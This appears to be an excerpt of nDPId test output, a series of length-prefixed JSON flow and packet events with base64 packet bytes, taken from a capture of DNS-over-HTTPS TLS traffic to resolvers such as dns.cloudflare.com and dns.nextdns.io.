UKAm3a49yHTGG7gVwYkqmq0TRbx3kmFRXEBuvlULDIz+RlQyLwuJX5uRyHubvUf803FCAz\/4a9pnE6WEDc+zOoXHErWhAfoc5tjJI1gMxGX8U3yJwrwEtij2gQTn0Bbv4+6DXg8iV1mRetvz2V395BS+h9qVm0PJky45RjI5FxKVNW8VUHbBkrW32Ln2Pm3mojmUt+Xsx7zInkOkVoS97LxHGe13JTpikDPPGgpjpEoHIcQRKqtRb0XznaWZx01cfmn3isfcOxCOvXJUXQwHOBr0ZOeVU8JyV5j86F3c2x16THC9pMZadmbjMRbWkSLTw4DMHNpPKhS6WbcQJhxPZwfAVbKEjktlF0JguUnWmRyDWlD919TvF+XWK\/xSop+ME26vjlWYdWryJvX71XiN34ciEg6jsS9BSYdT6j+C8MLHQApTVrKIlUjg7LizXHOZ\/8TbPIjDL1MmbwanCPsnz+x51R4gaxLum0nLoSL+ZmdQWjq\/uyo2YE03WUuDCwEqP451PgmdaqLRPfWLB1DwCAkXZchOxevuMOjyvWV6dC+e+ksCIkxwJmTgcBQXwfuBwje22m5Cj2nv\/zq4aMsV7kiFOS1VcPYLEbw+c4UolvdLrBBCbMxCQZeGhjAzGdsZDuX\/6sRIGIbuHAE8nIh+KJ0joM4KoZNtLXSA2HqbNN+kRQ5gTFmAp4mqAOgsHxAv6V1xCZg8P3MEffeog7NEB4\/K8wtwtgVyjvZaZ4E5jbN5Fjj\/jqK88SEXhkPYnN+on2bA\/r\/BMBIaoCajkogUyGLoyIPMT+pBrWa+wfZKdLurwPxZw+jCxKJC0\/mmFBL81N3ktV2QA+uWulN8QPCd7cD0\/Hjf2QklIJga5shMEJkHY6px3Tk68O3abNmIreZ6S\/N71agsTVbVTSaRlprW4p5D79LYThW+q2zikyKF2eG4VtVQ1Z087sY8sCBmmZG8ETPN5Xq0TN3Q1mXCkwjS9y4DvkEf4d2VKsFN6yj110+kONDzC8lVgKicr46oqIhZ9cyUDwr5+MuFqHiF2KMvJx9XA7v9+a265RIEavlSRTRm3PXbeYNOWUADrJWXjguUacdKmikyCoiD9vRp7ll6YxsV5jSfRT\/9SmZeNE+aTDy2wakB7qY1oeeLE4kVchDyQa22zUAtVHOgOvTZInJYA\/takDFgegJnQaYWISVIejbCOHLLvY\/LGAj1CyqRrh1\/LJm06TJxFQn5cMNb5SSEJFNyxF75PSPT288zWx2Va0aIhDIB+vku9QlaiV4ac8CwDTFNaqbQKECa5ibv22eB002L0jyDWacUoUluFvwofh+CTE377hEPfvjsRjX+V3P\/erPya8F4fW7JQkFJgCrTK1VaoDF64ZvLzNQJ5aCIC3Js6D+sD6g4jOpLHGy2zHMlk9wTN+yBybuSBsrJL9uS5j3JgQRC167kARpn8\/3wkN3\/lvlFPoVYVhj99l\/NeW6y\/YdomeNnyw0D7qas3wz1t0EQFticUf9LLfRMzRHEf20AYOoy9Fonct0XWUb6fLDU7CQJTqCHU8Eiy+rgD2t\/dxE4NlpfZ2ZSbDZ7QWFdftipHKlR4nJqLL0sU6kjZ8SydsZ8oAinHCIV9v5PNYgUBa8WbGYb2kgxJMSN3jbYzsoGwAsbdeAghc0S7LurZvISJXwa0jBqUzUHZmweZXCdDnfDiPc92KCXG9hA13VfXTouQnTd0zyBwPxIcvLGDhAu1CCSmBlGZrOEjmOi1\/i4ug\/A=="}
00946{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":326,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":20,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":946739378577,"flow_last_seen":946739378607,"flow_idle_time":7560000,"flow_min_l4_payload_len":283,"flow_max_l4_payload_len":2503,"flow_tot_l4_payload_len":2786,"flow_avg_l4_payload_len":1393,"midstream":1,"thread_ts_msec":946739378607,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"104.28.28.34","src_port":33724,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.DoH_DoT","breed":"Fun","category":"Network"},"tls": {"version":"TLSv1.3","client_requested_server_name":"jp.tiarap.org","ja3":"d0ee3237a14bbd89ca4d2b5356ab20ba","ja3s":"eb1d94daa7e0344597e756a1fb6e7054","unsafe_cipher":0,"cipher":"TLS_AES_128_GCM_SHA256","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}}
00547{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":327,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":20,"flow_packet_id":3,"flow_last_seen":946739378610,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":118,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":118,"pkt_l4_len":84,"thread_ts_msec":946739378610,"pkt":"REREREREZmZmZmZmCABFAABoLytAAH4GiGoKAAABaBwcIoO8AbvZKqYtoyMiIFAYAfVFVQAAFAMDAAEBFwMDADUQNuPt6m2nY9MgXiEHZRB5L+gDtuMOMxUUfy82Uox32sOXoFpXHp3NUSfU3Rmr6gABtUijkQ=="}
00581{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":342,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":21,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739380697,"flow_last_seen":946739380697,"flow_idle_time":7560000,"flow_min_l4_payload_len":288,"flow_max_l4_payload_len":288,"flow_tot_l4_payload_len":288,"flow_avg_l4_payload_len":288,"midstream":1,"thread_ts_msec":946739380697,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"1.0.0.1","src_port":53802,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00851{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":342,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":21,"flow_packet_id":1,"flow_last_seen":946739380697,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":342,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":342,"pkt_l4_len":308,"thread_ts_msec":946739380697,"pkt":"REREREREZmZmZmZmCABFAAFIsgNAAH4Gh+8KAAABAQAAAdIqAbvH6z5LSWNp6VAYAfbC9wAAFgMBARsBAAEXAwNccnLckexdP3Wz7tsKiknbwUElui2FZGSKODu9LnFkjSDCKDL2dIORj+O\/DGu\/+ddISHKLc0yxsHWSEQ0iee1a7AAmwC\/AMMArwCzMqMypwBPACcAUwAoAnACdAC8ANcASAAoTARMDEwIBAACoAAAAFwAVAAASZG5zLmNsb3VkZmxhcmUuY29tAAUABQEAAAAAAAoACgAIAB0AFwAYABkACwACAQAADQAaABgIBAQDCAcIBQgGBAEFAQYBBQMGAwIBAgP\/AQABAAAQAA4ADAJoMghodHRwLzEuMQASAAAAKwAJCAMEAwMDAgMBADMAJgAkAB0AIM\/CjtFE6\/BfV0qVOcMMUIig11i56\/tpHaQ1FlARye8w"}
00904{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":342,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":21,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739380697,"flow_last_seen":946739380697,"flow_idle_time":7560000,"flow_min_l4_payload_len":288,"flow_max_l4_payload_len":288,"flow_tot_l4_payload_len":288,"flow_avg_l4_payload_len":288,"midstream":1,"thread_ts_msec":946739380697,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"1.0.0.1","src_port":53802,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.DoH_DoT","breed":"Fun","category":"Network"},"tls": {"version":"TLSv1.2","client_requested_server_name":"dns.cloudflare.com","ja3":"d0ee3237a14bbd89ca4d2b5356ab20ba","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}}
04322{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":343,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":21,"flow_packet_id":2,"flow_last_seen":946739380725,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":2892,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":2892,"pkt_l4_len":2858,"thread_ts_msec":946739380725,"pkt":"ZmZmZmZmRERERERECABFAAs+VjZAADoGHccBAAABCgAAAQG70ipJY2npx+s\/a1AYAELM7QAAFgMDAHoCAAB2AwNqFtv3xWSYHbL\/TEVcxTgtPyY5syhT1Ar0J7GcYm2olyDCKDL2dIORj+O\/DGu\/+ddISHKLc0yxsHWSEQ0iee1a7BMBAAAuADMAJAAdACABwPRBPqMH6tP2UgTdU38yy4IBdMrNy3Y26n6nkJgoEgArAAIDBBQDAwABARcDAwqMAOf8HgLdG4eR2zQrlVcXNJK6gSgekjnntDDuH\/5mItzTS2PjuRorCZtp1e456Yzxd\/c9Pjo0KqOApsf0Oet3HLAxOPX\/4mq0oqPJv6\/pWYh6XkL49x7kn3sA8FLizWIik5oy6pRjSBWFf6tqxUO+Djt17wQK6yhMls9hUq1ClHJUh6Qn273NZpiWOuHCd9wGeCfeInHvS8qk0EqIdne\/5O3+AKgM\/cALapdKbBhIoAyrPwqC2hLjGuasAzda3QO\/+ESHum\/F9d6o\/5K+8IYpY8o8qtVJ6Drg8futbzGhAS87lZYW5UeuuFH05CzhM6cODq7gNj4mbPjTJ5ApTRpwsXEw0cwu6tAiKdHBHu4s131JOS1nhPpDpOs1W8FqhOijP5pChk7nVfwQ9Bu1xYiYmTlZWYP4bC0IhVSltsY4+ffd9etk6QNu1u5Seoh1QaWRe4DU8GYPqDdj9ywHuBnTu\/kdk6yObRcYizbhLyG5JiQSyxA9bv7iPMzOSI\/oPD6Rw4c6cy1qJywZ7F9o\/W7KUU6pYYhqWRcunfBOy2cedxZtVaWxcAQGD7VjEr1GjI\/ndJEL6DV\/vUO5PSsHgdX\/GScVrZdS\/KHwHxAHOv1BpKxNHl+ElIeVfCJc4tBsNkoBf5+COT0BV1cqDq\/0TqIcpVxlMv3\/7JDTZZTI\/wMxcbTZkEC580\/OL4P7o7ZBv1lVciiiGUxirK0Wn0VmKVkOPUH1VVDEVtxbspQjAQAudOqLnKMivdYYnLWKcLFjjfuE8XwFn1JkF2YyGgtdu+0wxe7V3QdQyeX6wSKDfGOBn1RHTiZSQJLrjf\/MjK6PK6+6dmcX2K\/Nos\/HKCWzOCSGOxH6pgvl94s\/0dDawx7iAmW0aKHP7fN\/Qsuj7qBRlYmeX3wDSe3ACAyO8PJtifBKRUnx+i44zF\/TEZT9\/0f9hj1yXYZhM4IttxvCtS3N7k187lM2JB6HB4DmePSpA5UfxEPRq71lNWUsDLAAiN3ekJSKoZ7PUpp\/6SJsuSwyITjf4EqBLpeWL9MrWeNXoUk5W1F7hWZmXxUwbc9PMEuirTVJUIeKJcMT3hUo1x6K9jQ+3H\/3FjLuAvSaGN20\/JlmWzUhH2c19MbTsBdNUca8p5h9ftAYWxNZFi+BPME56GacRIjusosOaDm6TM6NIeJtcd5nQ0Y6NbfwEe7MdB0akdNH1SZ5FpPCUXE+5h9eWmGzxT6gCZx6qvA46+kjmSPa8Cj85dDYPgUItxPMDzQDmcDkFl4Jtoqp7CsVbgDs2FaRSNSCg+ZMEThJQx0\/Aqz+vGM8Axcf5cpBgdqJqmkgft7WVM6LgxM0bWa6ReLOTbftdrjvt51qS7oW8iSFCaAMyVHnB9nNub1rCB71JGnHgmpLaDriPHmvZHyXG+tF3YYxqKFpVLMzSELDqif9S44Mrb9ZjnIWKvGQryM\/QSKoEg5X7zctl4vxNBFap6BlJhqRr3fm7FAc37N2CcUPqfx3Q8d+odOusP4Ls3Xq2Sur1UmBSNW9zqMAV9eCaagN4swiO+HX9D1JhZPxXTW9QWyDXi2zI1HI7LUB70fqeJS7u5T5BooNTQeoNzZVCvWOXWLt+ZiIbxI46okrDHFQXi\/x2G\/UqXdfkOEinNyh78FxOnrKcOtvfU1vQdaz7Z3d1S6XTGxIbp7Avs8yqCBkfYYx0okhQoRYkFViIAKhs8EJ22ENemkpy\/xMNRrY7HXIqAF0plC7ASy6aRPBxNQLpe6Ed5IaeUHDV+pWuEiLAgXAO3BIyMmN+dKwyJRSjGew81SAxYCXzqNGK2p7GdpO\/XP0maghqEG1aIROtTBX2ArldnERnpk4NXjDbfgsSkzP20ClfXeN4yjZTmAjINRHsDFyBG2kVPsbWM6bJ6sXUqNBkjHzH8mUguB01CThNReqO2rGsLiKr5qTMAwxKxjfEdoEJ+OdtfVMDr3B0PaBDiW6NDXICwJTMjrTiHsqLMySrS2T3BXPc1yBL+jDROuKYyhTZQzCA6ktzSKC6wAMC\/2RMbHnV4JUqSuJoXnZI1jiGQfafDh9qm0ZR91\/Upntxs\/kWZ9Zofn9x4gsvGL94XY2stn+kYJ+lpR5T38ZBRBOsXu8bAGsKAP+3wt7PlEML8VYdMSv1Y8XhaZ4vQZT4mxjokM8a+\/vbBm5OFXEOAsw3UpeMp5Pdlywdfks9xANyyHcs7XyT+4nzRjV93W+RbJVksh761\/0CsogB0Bf4AeRq1b8bSy2mVWD\/C9oBFlc4PSw+jhx1uKdorr8amCiJ2bwSUXaBBKYKGtf3eKS0Vrr8DWhAzmAupA8TRMiBwDgWH\/pSpuuBxo4fKT36lTdVMpKIp966xzVRYeAdyJ8dQTy5jeDQL1o\/K9FAvaIxIHdqy3Ai9UpxdTmYwoZXk1RGWSFQPWK2eEqydFLHkwLiG2A9OQ8pCYrZlqHUn1snev7fQAbwrXFOXDJskS+CYp+0GQvu\/Fu37N\/vYvDe9yQ2BjQyb\/Aq\/mNLHkdVzTu+oIIX6og2jNse2SlImfdMuiBssQFePUieOP3nrkgegmZDkJvZU8\/IJtyIPGhvEr4wy0KRjmbk1R5TV1oh+Gvyump800hgoeZ6yINLishVXjkSrZbw30TzgVyIHMXbfVH5cMb\/otpjX8v74ViZ68NiQoVQGCiu9Qccb9jITaHI7YqId83HAhD0Mgcvql8x4riVhsLhWBp7KARZMNylg6FCWQzYhkomLcDqOeaHr\/i3Kucv0p5GzUzkUvhbOyyBarVy1r5EY3Ff\/LeERfwiWeu9JMjSlW9a76FWzNvpbjiVQvAXjpJS+B6vW0S676\/2F\/QVlBvmv\/1e3jfE46NEORC\/KvStAu1+NCVXXkgYYjYaavSuMFqEVMBLpNt3pqmD175kYHYjG6R6TDv0nmjRk\/fdkSOg4ydMi2g43e05SDICPCTBrKL+H8pdmtKEp3WxofXZCtNR+ckTvaTdfJXZMWJbImpAgp0edudixTNqo9z3f5BRBQ1U170EzzThEQIMmS6RHUG4MBWpfatZDm+5s5WqxzAc+f48z+5\/Rjpm1MjT7FAj2QOS2mS1pZuw8jR7f9mlmDHlYUa7yULFKz+EOcDFjny+TGuKCw6tBmvp0uAgOgbWkR3PGwLQlgJNN5qcasz\/DdlRFFRc1kdK872NuK41RPGMSa34kfvjKckPj3jn4ntsF1i9WcRtXZaTKddZmAVoibh8F7o+\/2BqWfWHshjLjbv2UXOWt85MGeIvvR+JAZ4lQKxhMp4ApqHsqTnv9vjAIsk+AJwp0L3kf96BrAf5lxFwLByeiu2ScazZunSG5IvLxJ2cCZzgYOFm\/xSZPCmFYvKNJw727A0qH0cpDBKVk4Z5vvRen3ROFERblATF0imHD72RVGcQ\/rMrcnTAneuS+605QxQwV5cyssndlHujOT5cJjQwi4Me+A9i\/U+gGMItbvzyiV\/bH\/dnSH\/6+REX1pIGyZTP+9n2MXLAZnibrKAMIRfK2TIfrOe5jmJF94vcBm\/\/5ycPeTZII89RYTOm\/OYD7dCL\/Fj+p2ZF9GMMq1KmH\/crTCIqHICoTep9ezhaM3lurJnltFyZNv3oliEoTfl"}
00946{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":343,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":21,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":946739380697,"flow_last_seen":946739380725,"flow_idle_time":7560000,"flow_min_l4_payload_len":288,"flow_max_l4_payload_len":2838,"flow_tot_l4_payload_len":3126,"flow_avg_l4_payload_len":1563,"midstream":1,"thread_ts_msec":946739380725,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"1.0.0.1","src_port":53802,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.DoH_DoT","breed":"Fun","category":"Network"},"tls": {"version":"TLSv1.3","client_requested_server_name":"dns.cloudflare.com","ja3":"d0ee3237a14bbd89ca4d2b5356ab20ba","ja3s":"eb1d94daa7e0344597e756a1fb6e7054","unsafe_cipher":0,"cipher":"TLS_AES_128_GCM_SHA256","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}}
00549{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":344,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":21,"flow_packet_id":3,"flow_last_seen":946739380727,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":118,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":118,"pkt_l4_len":84,"thread_ts_msec":946739380727,"pkt":"REREREREZmZmZmZmCABFAABosgVAAH4GiM0KAAABAQAAAdIqAbvH6z9rSWN0\/1AYAfXCFwAAFAMDAAEBFwMDADVke5XeBLKUZMMwsdywo3cwWM6dcwvPxEIBrrKuQwAVECVGBCt8L\/1vmMSczXlzhvKSsbEzJA=="}
00584{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":358,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":22,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739380870,"flow_last_seen":946739380870,"flow_idle_time":7560000,"flow_min_l4_payload_len":284,"flow_max_l4_payload_len":284,"flow_tot_l4_payload_len":284,"flow_avg_l4_payload_len":284,"midstream":1,"thread_ts_msec":946739380870,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"45.90.28.0","src_port":33338,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00843{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":358,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":22,"flow_packet_id":1,"flow_last_seen":946739380870,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":338,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":338,"pkt_l4_len":304,"thread_ts_msec":946739380870,"pkt":"REREREREZmZmZmZmCABFAAFEC7lAAH4G5eQKAAABLVocAII6AbvzwYfFjc3Z3lAYAfYLTQAAFgMBARcBAAETAwME0sG+tMqbxpRl1DV8Z2dnX5LfzpIiHTt74xC1bVbZqCBq5Am0FD9Ax\/Z0hd9jpGF+x36pK3fx2LqXRJeDdYghvgAmwC\/AMMArwCzMqMypwBPACcAUwAoAnACdAC8ANcASAAoTARMDEwIBAACkAAAAEwARAAAOZG5zLm5leHRkbnMuaW8ABQAFAQAAAAAACgAKAAgAHQAXABgAGQALAAIBAAANABoAGAgEBAMIBwgFCAYEAQUBBgEFAwYDAgECA\/8BAAEAABAADgAMAmgyCGh0dHAvMS4xABIAAAArAAkIAwQDAwMCAwEAMwAmACQAHQAghy6XniNnPGDj9u0r7tzchu6tmfTKqCDkZge3YRdGMjI="}
00903{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":358,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":22,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739380870,"flow_last_seen":946739380870,"flow_idle_time":7560000,"flow_min_l4_payload_len":284,"flow_max_l4_payload_len":284,"flow_tot_l4_payload_len":284,"flow_avg_l4_payload_len":284,"midstream":1,"thread_ts_msec":946739380870,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"45.90.28.0","src_port":33338,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.DoH_DoT","breed":"Fun","category":"Network"},"tls": {"version":"TLSv1.2","client_requested_server_name":"dns.nextdns.io","ja3":"d0ee3237a14bbd89ca4d2b5356ab20ba","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}}
02432{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":359,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":22,"flow_packet_id":2,"flow_last_seen":946739380903,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":1506,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1506,"pkt_l4_len":1472,"thread_ts_msec":946739380903,"pkt":"ZmZmZmZmRERERERECABFAAXUAxlAADQGM\/UtWhwACgAAAQG7gjqNzdne88GI4VAQAnmV4AAAFgMDAHoCAAB2AwNSUVDmrRSBFJr3VlpPTiOBfna69z7Ip3AgaZ4JY8XZPCBq5Am0FD9Ax\/Z0hd9jpGF+x36pK3fx2LqXRJeDdYghvhMBAAAuACsAAgMEADMAJAAdACBgLhCqxZDxBYT0wty93r8WAtFFYd34UV+f0SYd9yF0RxQDAwABARcDAwAgNdJG6I7V9ce0uN\/W8MyCm58pWjfsCFZXXJnMcWaU4P8XAwMJ4l4xzn1tklFeMfXUSkilkOHkR2CrV0Fk61C4hUjayiVX3XCUzF\/nVmk3NsjsUuGQs+ELPFl7aLMJpdeipyb\/BRKM7DDOdlmSjSZFpz3sI+4Ap1vb842GKpbBCp1KIgOgnmXfMMwnL4uKzNN2+XpL8V9LwuMNROahwk9tJrSx3BZQnvVy5qktKVugzkoTSb9fPpFovSjkUbQUBQuFWl2cxLyQBO6gjWiaDBpgoqREkqW2UGurTHpBXCvX7xTK+SGfs3VLNGPL\/jM509wXezmGXrBZolGpSBcCmwqP5AGjSUkJQ2KFF8\/5I5DLe1rWw\/7rCzdCJgW7dwItPpQigYvEpUhaTQyjzhLtXm4Br1gtr+Iuf0HPHYTCtm1Z9061ijlO7AesYAg3NSX4lpTeBeQNzqwAGQi0kxU+8BsfAI4uhNY4fwD\/tgZRm00kCDUGr0Hw1O0\/9wcQo2OrT4hVI8sBPv9rovACUd1xTXQBUu4c2UNVQr\/DAwgtr3oGHXN\/yf6hHksHqaO6ThyUELGPZgyTaAEJeYSlV\/UuFXosuXrXk+4M4bQmtm8xQA\/hPEgZw03CxD+XIQ9CziCJc2Lx3r4h2FdBiMwzohldpvHSBUXM2GuHl07Muv9yz1FfyzqYAimU2llIffa6XcR6\/N9ex4PCYrVYeRifJmT\/hN608lQ56Pm4ckRgIW72lS0ILwL91eG\/PWLw1TWr9OHqib8dqID1N28WvnDQAc1WG+OfvFA5Lx7KtiZ9\/3KI7f7RCYG\/5anpOjN3Yvo+yrHT\/\/9yxTpA2EDhXmw1I+drMKCfdVXEwoRqrQDXQ3qu16NE+piWO4zYtxH6MrZOf5GKUoqj85zhZkJ6n3Wtdfmw0p2w7uWnPZarz2kRT1hGv0H7uWAwQsIO2witiCTCAX0VhCKqX5eg9HlVQxEJ8e6aZG6udk28L+hlu2DjHm2cK3LT5siYCZ+61rOCmuWYzAzB4PZwDYNVRnV0GsHgMCnZc9N4\/ighhHZqiYL81av1zekzo7Qcc39eQmJB1\/vhuqI4+c3vKnv7ROdK1hsAX7hP\/VFs8H8ZF9FxFv36aFuAu1HQxIxhZTCwXDQcu5TzVx1PL5uguNjR7pwef7T5COi4aTCL27yji1k+uS4xQgf7uM7lfjr7UlwSz76e6z\/NdrgDABxN2pYomW51+xON8iXDOy0cXgxInpylLI6lmV7hJWGh+rssjjMTkzOSia\/tb6HN8MDXz8ND7qC4wdRBL+K2XXzk7CxXSZKHbU7oBKE3VuTcSRmBvFAj4jzbuAW9nVI5Yw9M7KxJ0oNCiAer+7rkuV1\/dCwQt\/7\/zkSRGAemKSurrkjoqozLCUcuNRu2YlaJLAc\/PeEJmeHXWSos8ReOKG9libwm6aBbFjBhBGqk11oBFxYMJe3fE8zx0cKng5v141kUW5K8KykDBQPlm38itlnDfJBFaB9Jn9F1Dk+fc1GMvxAKNX1KD189yDAOfdy35szVs+4vU19xgaD3Asb+3zoIgGeHaF3v5zAsODf1V7zFmYGD1A5VyodE+SZcg8yBGqWdCjN6Dq7+yW5n4whEBATh9+W8PK0m19STC9EnY\/KFQ8CMbZglLaqGH9UHLlwuaNZUfgFyrj24dAMianUUp6I5pp2CbweoDVXgQfGbkHcfYC\/73I2CAYRQxi4XFXP\/UJ7vD4Iv633KLKMEpQYwdikhrjOP"}
00944{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":359,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":22,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":946739380870,"flow_last_seen":946739380903,"flow_idle_time":7560000,"flow_min_l4_payload_len":284,"flow_max_l4_payload_len":1452,"flow_tot_l4_payload_len":1736,"flow_avg_l4_payload_len":868,"midstream":1,"thread_ts_msec":946739380903,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"45.90.28.0","src_port":33338,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.DoH_DoT","breed":"Fun","category":"Network"},"tls": {"version":"TLSv1.3","client_requested_server_name":"dns.nextdns.io","ja3":"d0ee3237a14bbd89ca4d2b5356ab20ba","ja3s":"f4febc55ea12b31ae17cfb7e614afda8","unsafe_cipher":0,"cipher":"TLS_AES_128_GCM_SHA256","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}}
02374{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":360,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":22,"flow_packet_id":3,"flow_last_seen":946739380903,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":1467,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1467,"pkt_l4_len":1433,"thread_ts_msec":946739380903,"pkt":"ZmZmZmZmRERERERECABFAAWtAxpAADQGNBstWhwACgAAAQG7gjqNzd+K88GI4VAYAnlzfQAACEkFkdj1Us7HE6XsQGxneQX\/pTaXJNHBzTBwjbjFH2PSLY9gxHervwko9HwLHhkgWdiRotlJENzv3dIlV0Q25g7GanzLzAoq\/bJLnF1bxRf0nf8R7xwqHIiEyWrnrfJqukts8v3m8MMBnkDAGd5xOmtynEVhFSJmjPZeWlanPH3W\/gPE9eVpcr\/bC8aD31d4wHJftv6KUYCRDzDXbCSoL\/6F7bgfENCEavhYW2LuID8zVPN+yKzb3WDD71Bfm\/QzlUMFQuZM5HbG0c7uIAOOAxkawVYPNiqL2TFCk1ynXFgmF4gXvbL\/HYrDLFRfjW4de\/NkjjSai08L+PfACua2q5oTvt2qGJPeolVEHsMmZEjEwazNhDwGqFKG5OP+F531r01cH7BTJcZ05QE7qXBrbvqwdtdoGPvG50ZEjeoenLq9i4bYfhTR7gqdrp+nT5HdXBlwZ3BA7TNBvRO28EIkDbwnbkKR1uAOgeHpmVvBpmpiphn4DYQZvVFKBDcAp0CgnjFhQ7BpU5nrco2WQPx+1Dj+wVwuk8wQg4nsuaxF9uoh5BJPTUJDd+oGcKzJnMyQnjiAungCkABFhOHccfPCI4WdjBjLMLNqgoxHw6DJHYylEKtOB9OnnXDF2J7Jvo9Dz26D1KrzmXsDWoLDC1fC96J8yd93fYvTZHskQxfY50BQIAKcBIdr8K4+MowCcaLlKXgQ2BvySvU9B5mJVdaqmTLF1fzesL+WRRK51q7IAwLh77wssc7jt76mm0H3PAWysYvmp\/NCiSKfjKaaLkm9x2NoEkekjBVCT4zJZaY12lyFWkBUvQQdolUu\/1tiRf86EnZ+MpspCpIhymi\/IUp68M\/Eb+2ljNKVmV1Er+pytZKFdhm+LxFZQDgPvwZts5tJVArrKTXEX7mbMUyNCFK87rJIQtF3h75H2QQdF8Dne8XAGsXDDnswycmS8W4DR2ei8Mvw6EchukCH49+5iX+zWw8yLNfbuXrdtwpsTWibehpgDGJwJ32GJ3PUhcT2O8ckRkT01hA4OhJ5s8FVi9G4sK5PSDUaW\/FVD5mXCOlbG6fI8ep93Cq318IKEa9gHWkRIcGP1KNeJ0vqPt6W+fiprWcAT+y38\/pHS\/DIldwWXxoakgp8kEgE10+BHsdUGoLtM0vHARs9JoXziCU\/gwCe4xJoYT7yIuKPLoyyOJzupzLZV+Yx6GthfYTU5x9FRZbuuSu\/4e+BWK3Ph42jg8FFm3MjO7iYnNl4v1+ChQKVR7XODNZWDH3jwqcZ8qhbkD9u5SI6j\/BA1C0rUPcBjh1+6XjoNgW\/MuFBBpUx0b9PcVFriOAhMdQziZ17xbnHnF7nwzD4ltsyPw098+Y62NYg0g7ZzmYgr7Bp\/OQu72rrzto9ZurPdNMKCU\/kuUSQfJNRXnpCKpphgwF89PQmt81ZhzDDg8jGUYjA+eCwP5b5c3W1mHz2rbpTYaJ5WAEPawg7kcD\/0daljt7SoSzY0j1SW+z8PqelVSwUwhQf5v+dUBJntKDTvIA8dd3\/P5RebSAS6fwWCMpEa2Wpe0EbiTKfmmwomuAMmkjN4HlloVMdOTeEonHISxyYlgXipaeXT8CPFbuFXE4ejDU2aTkR9\/ZIbgoZdx7